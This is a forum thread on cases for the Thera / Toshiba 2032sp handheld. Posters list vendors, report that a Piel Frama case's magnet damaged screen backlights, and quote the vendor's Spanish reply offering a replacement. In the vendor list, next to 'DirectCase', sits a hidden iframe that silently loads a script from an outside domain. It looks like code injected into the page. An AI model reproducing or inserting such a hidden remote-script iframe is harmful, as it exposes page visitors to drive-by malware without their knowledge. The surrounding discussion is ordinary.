+ Reply to Thread
    Editor and Site Administrator Convergent's Avatar

Where can I get a case for the Thera?

The following sites have cases to fit the Thera.

Nutshell - Tuff as Nuts
    Piel Frama (See Note in Post Below)
    EB Cases
    DirectCase<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Mike - Been Converged?

Updated

Added to list...
    Mike - Been Converged?

WARNING!, WARNING!, WARNING!

I just bought a Piel Frama case for my Toshiba 2032sp, and even thought the case is of an excellent workmanship and very good looking, there is a problem. The magnet in the back of the case (to keep the lid part close) have damage two units. The screen light will go off for ever .

Right now I'm emailing them for support on the case. I will update with the results.

Updated

Updated
    Mike - Been Converged?

Over a week later I finally had a concret answer from Piel Frama:

Estimado Señor Francis,

Disculpe esta incidencia ocurrida. La gama de fundas para el
    Toshiba 2032 en su primera tirada han sido retiradas por ese error encontrado.
    Ya hemos solucionado este problema. No se preocupre que le enviamos una funda
    nueva sin este defecto. En cuanto a la que tiene no se preocupe que puede
    quedársela.

Hoy mismo sale el pedido y perdónanos las molestias que hemos podido
    ocasionarle.

Atentamente:

Luis Casillas
    Http://www.pielframa.com

They retired all the cases with the magnets and now they offer a different solution. And they are shipping me a new case today.

I love happy ending

Thanks for posting this. I have a Piel Frama case as well. I love it. In fact, I recommended it to two colleagues who purchased them and then had their backlights go out very soon after using them. When I contacted Verizon they did not think that was the problem. I have emailed Piel Frama and hopefully they will be as courteous with this matter as they have been with everything else I have needed from them.

I have been lucky so far and I haven't had a problem with my backlight, but I'm going to stop using my Piel Frama case until I hear from Piel Frama.
    -Patricia

Originally posted by "outlookchick"

Thanks for posting this. I have a Piel Frama case as well. I love it. In fact, I recommended it to two colleagues who purchased them and then had their backlights go out very soon after using them. When I contacted Verizon they did not think that was the problem. I have emailed Piel Frama and hopefully they will be as courteous with this matter as they have been with everything else I have needed from them.

I have been lucky so far and I haven't had a problem with my backlight, but I'm going to stop using my Piel Frama case until I hear from Piel Frama.

I think I saw your letter on their website. Besides been the only third party leather case available specifically for the Thera/Toshiba 2032sp it is also a great looking one and very well made. If you look at the pictures on their web site, the case has a snap on bottom not a magnet.

Yep, that was me on their website. I am thrilled with the case in general. It is very functional and I actually have stopped carrying a purse most places now because I put my drivers license, credit card, and some cash in the case and I'm all set.

They have already emailed me to tell me a new case is on it's way.

I have had nothing but great customer service from them the entire time. I recommended them to two other people here at my office who have Theras (broken ones though...they are out for repair now) and have encouraged them to write to Piel Frama and ask for a replacement case.
    -Patricia